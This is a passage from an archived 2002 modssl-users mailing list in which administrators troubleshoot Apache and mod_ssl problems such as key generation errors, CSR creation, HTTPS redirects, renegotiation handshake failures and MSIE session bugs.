>--Edward Wong
>
>
>_________________________________________________________________
>Send and receive Hotmail on your mobile device: http://mobile.msn.com
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org




_________________________________________________________________
MSN Photos is the easiest way to share and print your photos: 
http://photos.msn.com/support/worldwide.aspx

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 21 16:19:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA15448; Wed, 21 Aug 2002 16:18:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from auemail1.firewall.lucent.com id QAA15440; Wed, 21 Aug 2002 16:18:03 +0200 (MET DST)
Received: from nj7460exch002h.wins.lucent.com (h135-17-42-35.lucent.com [135.17.42.35])
	by auemail1.firewall.lucent.com (Switch-2.2.2/Switch-2.2.0) with ESMTP id g7LEHuh07236
	for ; Wed, 21 Aug 2002 10:17:56 -0400 (EDT)
Received: by nj7460exch002h.ho.lucent.com with Internet Mail Service (5.5.2653.19)
	id ; Wed, 21 Aug 2002 10:17:56 -0400
Message-ID: 
From: "Shah, Kishor (Kishor)" 
To: "'modssl-users@modssl.org'" 
Subject:  Apache Start-up error-oops
Date: Wed, 21 Aug 2002 10:17:54 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Shah, Kishor (Kishor)" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

My apologies to the group for some unneccsary text at the end of my prev mail.


Kishor Shah
email - kishorshah@lucent.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 21 17:28:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA17468; Wed, 21 Aug 2002 17:27:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id RAA17462; Wed, 21 Aug 2002 17:26:48 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g7LFMspd000688;
	Wed, 21 Aug 2002 11:22:54 -0400
Date: Wed, 21 Aug 2002 11:22:54 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org, Kishor Shah 
Subject: Re: Apache Start-up error
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, 21 Aug 2002, Shah, Kishor (Kishor) wrote:

> [Wed Aug 21 09:52:02 2002] [error] Init: Failed to generate temporary
> 512 bit RSA private key
> My environment is, Solaris 2.8, Apache 2.0.40 with mod_ssl, OpenSSL 0.96g.

Try using prngd.

--Cliff


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 21 17:38:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA17687; Wed, 21 Aug 2002 17:37:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ihemail1.firewall.lucent.com id RAA17679; Wed, 21 Aug 2002 17:36:40 +0200 (MET DST)
Received: from ascc01.ascc.lucent.com (h135-92-88-6.lucent.com [135.92.88.6])
	by ihemail1.firewall.lucent.com (Switch-2.2.2/Switch-2.2.0) with ESMTP id g7LFab312407
	for ; Wed, 21 Aug 2002 11:36:38 -0400 (EDT)
Received: from ascc01.ascc.lucent.com by ascc01.ascc.lucent.com (8.8.8+Sun/EMS-1.5 sol2)
	id LAA29416; Wed, 21 Aug 2002 11:36:36 -0400 (EDT)
Message-ID: <3D63B4B3.B034771C@ascc01.ascc.lucent.com>
Date: Wed, 21 Aug 2002 11:41:39 -0400
From: Leon Do 
X-Mailer: Mozilla 4.76 [en] (Windows NT 5.0; U)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache Start-up error
References: 
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Leon Do 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Also one of the problem I ran into was that if you have the ssl module, then you
have to run "apachctl startssl".

"apachctl start" will give the error below as well.

Leon Do

Cliff Woolley wrote:

> On Wed, 21 Aug 2002, Shah, Kishor (Kishor) wrote:
>
> > [Wed Aug 21 09:52:02 2002] [error] Init: Failed to generate temporary
> > 512 bit RSA private key
> > My environment is, Solaris 2.8, Apache 2.0.40 with mod_ssl, OpenSSL 0.96g.
>
> Try using prngd.
>
> --Cliff
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 21 19:27:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA20849; Wed, 21 Aug 2002 19:26:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from cats.ucsc.edu id TAA20845; Wed, 21 Aug 2002 19:25:20 +0200 (MET DST)
Received: from [128.114.133.60] ([128.114.133.60])
	by cats.ucsc.edu (8.10.1/8.10.1) with ESMTP id g7LHP7T13135
	for ; Wed, 21 Aug 2002 10:25:07 -0700 (PDT)
User-Agent: Microsoft-Entourage/10.1.0.2006
Date: Wed, 21 Aug 2002 10:25:08 -0700
Subject: Failure to generate CSR WinNT/Apache - Help
From: Peter McMillan 
To: 
Message-ID: 
Mime-version: 1.0
Content-type: text/plain; charset="US-ASCII"
Content-transfer-encoding: 7bit
X-UCSC-CATS-MailScanner: Found to be clean
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Peter McMillan 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have followed the Apache+SSL Win32 howto to the letter.
I am unable to to get openssl to generate a CSR on a WinNT 4 server.

I issue the command:
openssl req -config openssl.cnf -new -out my-server.csr
Follow the script making the appropriate entries.

At then end of the script, I fail to write out any of the files.

I re-ran the same installer on a Win2k box with no problem.

Are there known Apache 1.3.26+SSL issues? I've searched this list but
haven't seen a conclusive answer.

Thank you,

Peter

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 21 20:04:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA21510; Wed, 21 Aug 2002 20:03:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bard.edu id UAA21501; Wed, 21 Aug 2002 20:02:24 +0200 (MET DST)
Received: from bard.edu (pacer.bard.edu [192.246.229.24])
	by bard.edu (AIX4.3/8.9.3/8.9.3) with ESMTP id OAA30000
	for ; Wed, 21 Aug 2002 14:02:22 -0400
Message-ID: <3D63D6A4.4CA79830@bard.edu>
Date: Wed, 21 Aug 2002 14:06:28 -0400
From: Pandora Fawcett 
X-Mailer: Mozilla 4.79 [en] (Win98; U)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: version?
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Pandora Fawcett 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

why don't i see a mod_ssl version for apache 2.039? or rather when will
i see one?
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 21 20:10:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA22030; Wed, 21 Aug 2002 20:09:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id UAA22007; Wed, 21 Aug 2002 20:08:21 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g7LI4SMI001357;
	Wed, 21 Aug 2002 14:04:28 -0400
Date: Wed, 21 Aug 2002 14:04:28 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: Pandora Fawcett 
cc: modssl-users@modssl.org
Subject: Re: version?
In-Reply-To: <3D63D6A4.4CA79830@bard.edu>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, 21 Aug 2002, Pandora Fawcett wrote:

> why don't i see a mod_ssl version for apache 2.039?

Because you haven't looked in the right place.  mod_ssl comes bundled with
Apache 2.0; it's no longer a separate product.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 21 21:03:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA23335; Wed, 21 Aug 2002 21:01:36 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from seraph3.grc.nasa.gov id VAA23326; Wed, 21 Aug 2002 21:00:50 +0200 (MET DST)
Received: from lombok-fi.lerc.nasa.gov (lombok-fi.lerc.nasa.gov [139.88.112.33])
	by seraph3.grc.nasa.gov (Postfix) with ESMTP id 29059640C8
	for ; Wed, 21 Aug 2002 15:00:43 -0400 (EDT)
Received: from salderman.lerc.nasa.gov (salderman.lerc.nasa.gov [139.88.188.22])
	by lombok-fi.lerc.nasa.gov (NASA GRC 8.12.3/8.12.3) with ESMTP id g7LJ0gBg017590
	for ; Wed, 21 Aug 2002 15:00:42 -0400 (EDT)
Received: (smalder@localhost) by salderman.lerc.nasa.gov (NASA LeRC 8.7.4.1/2.01-local)
        id PAA03639; Wed, 21 Aug 2002 15:02:24 -0400
X-Authentication-Warning: salderman.lerc.nasa.gov: smalder set sender to sean.m.alderman@grc.nasa.gov using -f
Subject: Using mod_rewrite to force https in a .htaccess...
From: Sean M Alderman 
To: modssl-users@modssl.org
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.8 
Date: 21 Aug 2002 15:02:24 -0400
Message-Id: <1029956544.27053.602.camel@salderman.lerc.nasa.gov>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sean M Alderman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

  Is it possible to do this?  Apache seems to be converting the URI from
an HTTP uri to a file uri before it parses the .htaccess file.  We were
hoping to force https on individual directories where http
authentication is required, but we have so many of them we had hoped not
to need to do it in the server config.  The rewrite section of my
.htaccess file looks like-
#   Force clients from the Internet to use HTTPS
RewriteEngine        on
RewriteCond          %{HTTPS} !=on
RewriteRule          http://(.*) https://$1  [R]

But I get rewrite log entries have lines saying - applying pattern
'http://(.*)' to uri 'somedir/' - and I would expect them to be applying
the pattern to http://site.grc.nasa.gov/somedir/ instead.

Here's the rewrite log entries for a hit to the directory in question-

salderman.lerc.nasa.gov - - [21/Aug/2002:14:46:52 -0400]
[site.grc.nasa.gov/sid#41358][rid#95048/initial] (3) [per-dir
/usr/appl/www/site.grc.nasa.gov/htdocs/somedir/] add path-info postfix:
/usr/appl/www/site.grc.nasa.gov/htdocs/somedir/ ->
/usr/appl/www/site.grc.nasa.gov/htdocs/somedir/
salderman.lerc.nasa.gov - - [21/Aug/2002:14:46:52 -0400]
[site.grc.nasa.gov/sid#41358][rid#95048/initial] (3) [per-dir
/usr/appl/www/site.grc.nasa.gov/htdocs/somedir/] strip per-dir prefix:
/usr/appl/www/site.grc.nasa.gov/htdocs/somedir/ -> somedir/
salderman.lerc.nasa.gov - - [21/Aug/2002:14:46:52 -0400]
[site.grc.nasa.gov/sid#41358][rid#95048/initial] (3) [per-dir
/usr/appl/www/site.grc.nasa.gov/htdocs/somedir/] applying pattern
'http://(.*)' to uri 'somedir/'
salderman.lerc.nasa.gov - - [21/Aug/2002:14:46:52 -0400]
[site.grc.nasa.gov/sid#41358][rid#95048/initial] (1) [per-dir
/usr/appl/www/site.grc.nasa.gov/htdocs/somedir/] pass through
/usr/appl/www/site.grc.nasa.gov/htdocs/somedir/
salderman.lerc.nasa.gov - - [21/Aug/2002:14:46:52 -0400]
[site.grc.nasa.gov/sid#41358][rid#97d48/initial/redir#1] (3) [per-dir
/usr/appl/www/site.grc.nasa.gov/htdocs/somedir/] strip per-dir prefix:
/usr/appl/www/site.grc.nasa.gov/htdocs/somedir/index.php ->
somedir/index.php
salderman.lerc.nasa.gov - - [21/Aug/2002:14:46:52 -0400]
[site.grc.nasa.gov/sid#41358][rid#97d48/initial/redir#1] (3) [per-dir
/usr/appl/www/site.grc.nasa.gov/htdocs/somedir/] applying pattern
'http://(.*)' to uri 'somedir/index.php'
salderman.lerc.nasa.gov - - [21/Aug/2002:14:46:52 -0400]
[site.grc.nasa.gov/sid#41358][rid#97d48/initial/redir#1] (1) [per-dir
/usr/appl/www/site.grc.nasa.gov/htdocs/somedir/] pass through
/usr/appl/www/site.grc.nasa.gov/htdocs/somedir/index.php

Thanks.
-- 
Sean M. Alderman
ITRACK Systems Analyst
PACE/NCI - NASA Glenn Research Center
(216) 433-2795

Calling a windowed operating system "Windows" is like naming an
automobile "Wheels."
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 22 07:33:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA07375; Thu, 22 Aug 2002 07:32:59 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from selgw.esc.net.au id HAA07362; Thu, 22 Aug 2002 07:31:44 +0200 (MET DST)
Received: from wsjules2000 ([10.0.0.17])
	by selgw.esc.net.au (8.11.6/8.11.6) with ESMTP id g7M5eWx61165
	for ; Thu, 22 Aug 2002 15:10:34 +0930 (CST)
	(envelope-from jules@strategicecommerce.com.au)
From: "Jules Butcher" 
To: 
Subject: RE: Re-negotiation handshake failed (still trying)
Date: Thu, 22 Aug 2002 15:07:40 +0930
Message-ID: <002001c2499e$08aea980$1100000a@wsjules2000>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
In-Reply-To: <001b01c2473c$80aebba0$1100000a@wsjules2000>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jules Butcher" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

OK I still havent received any replies about this problem, and I still
haven't managed to solve it by myself. One thing I want to add, is that
I think I have eliminated my java client application as the source of
the problem. I tried accessing my server using openssl s_client instead
of my java app. This is the command I used:

cat postrequest | openssl s_client -connect my.secureserver.com:443
-state

Where postrequest is a textfile which contains:

POST
/MessagingGateway/servlet/com.StrategicEcommerce.StraightSell.MessagingG
ateway.ReceiveOBIOrder HTTP/1.0
Content-Length: 12577
Content-type: application/x-obi-order
Content-transfer-encoding: base64

AgAAAAAAJLxJU0EdMDAdICAgICAgICAgIB0wMB0gICAgICAgICAgHVpaHTY4Mzk5MDkwODk0
ICAgIB1aWh03NjQ5Mzg1MTI0OCAgICAdMDIwODIxHTEzMTcdVR0w... (content
truncated for mailing list post)

When I do the above I get the same errors in my apache ssl_log as with
my java app (see my parent post). Judging by the log messages would
people say that this is a mod_ssl configuration issue or a certificate
issue? It seems something may be timing out since it works fine for post
data of size less than a few K, but I don't know what it could be.




-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Jules Butcher
Sent: Monday, 19 August 2002 2:24 PM
To: modssl-users@modssl.org
Subject: Re-negotiation handshake failed



Hi All, I have recently upgraded our web server from NT/IIS to
FreeBSD/Apache/ModSSL. Everything is pretty sweet, execpt for one
application. The application (MessagingGW) is written in java using jsse
for the ssl stuff. The app periodically posts base64 encoded data to a
java servlet using http over ssl. MessagingGW seems to work fine when
the payload data is small, but over a certain size (a few kB) it bombs
out.

In this configuration I have Apache handling the SSL handshake, then
passing the request to tomcat via ajp13. Servlets generally seem to be
working fine over https, but in this case the servlet never receives the
request, which makes me think that the problem is between apache and the
client app.

If anyone has any clue about this, I would be very happy to hear from
you.


Server Software:
	Apache 1.3.26
	mod_ssl 2.8.10-1.3.26
	Tomcat 3.3.1

Client Software:
	Custom app (jdk1.3.1, jsse 1.0.2)


Below is the ssl_log file from the apache ssl log(I have replaced IP
addresses with [src-IP] and [dest-IP] below for my clients privacy):

[19/Aug/2002 13:04:35 98058] [info]  Connection to child 5 established
(server [dest-IP]:443, client [src-IP])
[19/Aug/2002 13:04:35 98058] [info]  Seeding PRNG with 0 bytes of
entropy
[19/Aug/2002 13:04:35 98058] [trace] OpenSSL: Handshake: start
[19/Aug/2002 13:04:35 98058] [trace] OpenSSL: Loop: before/accept
initialization
[19/Aug/2002 13:04:35 98058] [trace] OpenSSL: Loop: SSLv3 read client
hello A
[19/Aug/2002 13:04:35 98058] [trace] OpenSSL: Loop: SSLv3 write server
hello A
[19/Aug/2002 13:04:35 98058] [trace] OpenSSL: Loop: SSLv3 write
certificate A
[19/Aug/2002 13:04:35 98058] [trace] OpenSSL: Loop: SSLv3 write server
done A
[19/Aug/2002 13:04:35 98058] [trace] OpenSSL: Loop: SSLv3 flush data
[19/Aug/2002 13:04:37 98058] [trace] OpenSSL: Loop: SSLv3 read client
key exchange A
[19/Aug/2002 13:04:39 98058] [trace] OpenSSL: Loop: SSLv3 read finished
A
[19/Aug/2002 13:04:39 98058] [trace] OpenSSL: Loop: SSLv3 write change
cipher spec A
[19/Aug/2002 13:04:39 98058] [trace] OpenSSL: Loop: SSLv3 write finished
A
[19/Aug/2002 13:04:39 98058] [trace] OpenSSL: Loop: SSLv3 flush data
[19/Aug/2002 13:04:39 98058] [trace] Inter-Process Session Cache (DBM)
Expiry: old: 10, new: 6, removed: 4
[19/Aug/2002 13:04:39 98058] [trace] Inter-Process Session Cache:
request=SET status=OK
id=41131C9DCE1B61E17AF7997E89F58139BC5164A05AA734A9A70A39B065725CE0
timeout=596s (session caching)
[19/Aug/2002 13:04:39 98058] [trace] OpenSSL: Handshake: done
[19/Aug/2002 13:04:39 98058] [info]  Connection: Client IP: [src-IP],
Protocol: TLSv1, Cipher: RC4-SHA (128/128 bits)
[19/Aug/2002 13:04:41 98058] [info]  Initial (No.1) HTTPS request
received for child 5 (server [dest-IP]:443)
[19/Aug/2002 13:04:41 98058] [trace] Changed client verification type
will force renegotiation
[19/Aug/2002 13:04:41 98058] [info]  Requesting connection
re-negotiation
[19/Aug/2002 13:04:41 98058] [trace] Performing full renegotiation:
complete handshake protocol
[19/Aug/2002 13:04:41 98058] [trace] I/O: sucked 12556 bytes of input
data from SSL/TLS I/O layer for delayed injection into Apache I/O layer
[19/Aug/2002 13:04:41 98058] [trace] OpenSSL: Handshake: start
[19/Aug/2002 13:04:41 98058] [trace] OpenSSL: Loop: SSL renegotiate
ciphers
[19/Aug/2002 13:04:41 98058] [trace] OpenSSL: Loop: SSLv3 write hello
request A
[19/Aug/2002 13:04:41 98058] [trace] OpenSSL: Loop: SSLv3 flush data
[19/Aug/2002 13:04:41 98058] [trace] OpenSSL: Loop: SSLv3 write hello
request C
[19/Aug/2002 13:04:41 98058] [info]  Awaiting re-negotiation handshake
[19/Aug/2002 13:04:41 98058] [trace] OpenSSL: Handshake: start
[19/Aug/2002 13:04:41 98058] [trace] OpenSSL: Loop: before accept
initialization
[19/Aug/2002 13:04:41 98058] [trace] Inter-Process Session Cache:
request=REM status=OK
id=41131C9DCE1B61E17AF7997E89F58139BC5164A05AA734A9A70A39B065725CE0
(session dead)
[19/Aug/2002 13:04:41 98058] [trace] OpenSSL: Write: SSLv3 read client
hello B
[19/Aug/2002 13:04:41 98058] [trace] OpenSSL: Exit: error in SSLv3 read
client hello B
[19/Aug/2002 13:04:41 98058] [error] Re-negotiation handshake failed:
Not accepted by client!?
[19/Aug/2002 13:04:41 98058] [trace] I/O: injecting 8192 bytes of
pre-sucked data into Apache I/O layer
[19/Aug/2002 13:04:41 98058] [trace] I/O: injecting 4364 bytes of
pre-sucked data into Apache I/O layer
[19/Aug/2002 13:04:41 98058] [trace] OpenSSL: Write: SSLv3 read client
hello B
[19/Aug/2002 13:04:41 98058] [trace] OpenSSL: Exit: error in SSLv3 read
client hello B
[19/Aug/2002 13:04:41 98058] [error] SSL error on writing data (OpenSSL
library error follows)
[19/Aug/2002 13:04:41 98058] [error] OpenSSL: error:140940F5:SSL
routines:SSL3_READ_BYTES:unexpected record
[19/Aug/2002 13:04:41 98058] [info]  Connection to child 5 closed with
standard shutdown (server [dest-IP]:443, client [src-IP])

Regards, Jules Butcher

------------------------------------------------------

Software Developer
Strategic Ecommerce Ltd.

 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 22 13:28:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA15413; Thu, 22 Aug 2002 13:27:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from www.p2.experian.nl id NAA15408; Thu, 22 Aug 2002 13:26:50 +0200 (MET DST)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by www.p2.experian.nl (Postfix) with ESMTP id 191D82F0D2
	for ; Thu, 22 Aug 2002 13:26:50 +0200 (CEST)
Received: from shivaya.namah.om (unknown [10.200.3.17])
	by www.p2.experian.nl (Postfix) with SMTP id 8772C2C5E4
	for ; Thu, 22 Aug 2002 13:26:48 +0200 (CEST)
Date: Thu, 22 Aug 2002 12:30:50 +0200
From: Jeroen Vriesman 
To: modssl-users@modssl.org
Subject: why do I get this so often?
Message-Id: <20020822123050.2a114590.jeroen@experian.nl>
Organization: Experian nederland b.v.
X-Mailer: Sylpheed version 0.7.5 (GTK+ 1.2.10; i586-mandrake-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: by Experian Advanced Mail Virusscanner
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jeroen Vriesman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Does anyone know why I get this so often in my log:

[Thu Aug 22 13:17:59 2002] [error] mod_ssl: SSL handshake interrupted by system
[Hint: Stop button pressed in browser?!] (System error follows)
[Thu Aug 22 13:17:59 2002] [error] System: Connection reset by peer (errno: 104)

Almost every request.

Cheers,
Jeroen.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 22 14:24:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA16972; Thu, 22 Aug 2002 14:23:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from aeshna.cynapsis.cy id OAA16967; Thu, 22 Aug 2002 14:22:50 +0200 (MET DST)
Received: from grover by aeshna.cynapsis.cy with local (Exim 3.16 #1)
	id 17hqz3-0007bM-00
	for modssl-users@modssl.org; Thu, 22 Aug 2002 14:22:41 +0200
Date: Thu, 22 Aug 2002 14:22:41 +0200
From: Christoph Gröver 
To: modssl-users@modssl.org
Subject: MSIE Bugs, Summary available ?
Message-Id: <20020822142241.7c30045e.grover@sitepark.com>
Organization: Sitepark GmbH
X-Mailer: Sylpheed version 0.7.8 (GTK+ 1.2.10; i586-pc-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Christoph Gröver 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi All.


We have also these "popular" MSIE SSL 3.0 Problems.

The Problem as we have found it:

We have the Apache Versions 1.3.19, 1.3.22, 1.3.23 with the mod_ssl
Versions 2.8.4 - 2.8.7 running on different systems.
No proxy, no Firewall in between, just plain LAN.

We have tested all available browsers. The result is pretty obvious:

All non-Microsoft browsers work flawlessly ( Netscape, Mozilla, konqueror,
 galeon, wget, cURL etc. )

All MSIE's do not work (incl. 5.0, 5.5, 6.0x Versions).

Not working means: They work most of the time, but now and then especially
if the webuser is a minute or more idle the next request gives the infamous
"page cannot be displayed,  server or dns error" - blaming nonsense.

Of course all standard MSIE workarounds are enabled.
Also I have found a document via Google with a list of especially
buggy implemented ciphers and have disabled them all.

But to no avail.


Does anybody have any summary for any possible solution to these bugs.

(Yes, I know the only real solution is to not use MSIE, but we cannot force
every user to use a real webbrowser).

Thanks for your time.


-- 
Christoph Gröver, grover@sitepark.com
Sitepark, Gesellschaft für Informationsmanagement mbH
Rothenburg 14-16, D-48143 Münster, Telefon (0251) 48265-50
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 22 15:15:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA19021; Thu, 22 Aug 2002 15:14:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id PAA19016; Thu, 22 Aug 2002 15:13:32 +0200 (MET DST)
Received: from itaction.co.uk ([194.106.52.27]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id H18Y2H00.51Q for ; Thu, 22 Aug 2002
          14:13:29 +0100 
Message-ID: <3D64E374.3040004@itaction.co.uk>
Date: Thu, 22 Aug 2002 14:13:24 +0100
From: "Peter Viertel" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0+) Gecko/20020430
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: MSIE Bugs, Summary available ?
References: <20020822142241.7c30045e.grover@sitepark.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

My money is on a SSL session resume problem. Make sure your SSL session 
cache is configured correctly - one thing that really bites us all in 
the butt is that some MSIE versions get annoyed when it tries to resume 
a session in what it thinks is a reasonable amount of time and finds the 
server refuses to do it - to satisfy this requirement you need SSL 
sessions to be cached for long enough - try 10 minutes - and use ssldump 
to verify that sessions are actually being resumed. The point here is 
that according to the SSL/TLS spec it's alright for the server to refuse 
to resume a session, and most other browsers handle that bit correctly.

Christoph Gröver wrote:

>Hi All.
>
>
>We have also these "popular" MSIE SSL 3.0 Problems.
>
>The Problem as we have found it:
>
>We have the Apache Versions 1.3.19, 1.3.22, 1.3.23 with the mod_ssl
>Versions 2.8.4 - 2.8.7 running on different systems.
>No proxy, no Firewall in between, just plain LAN.
>
>We have tested all available browsers. The result is pretty obvious:
>
>All non-Microsoft browsers work flawlessly ( Netscape, Mozilla, konqueror,
> galeon, wget, cURL etc. )
>
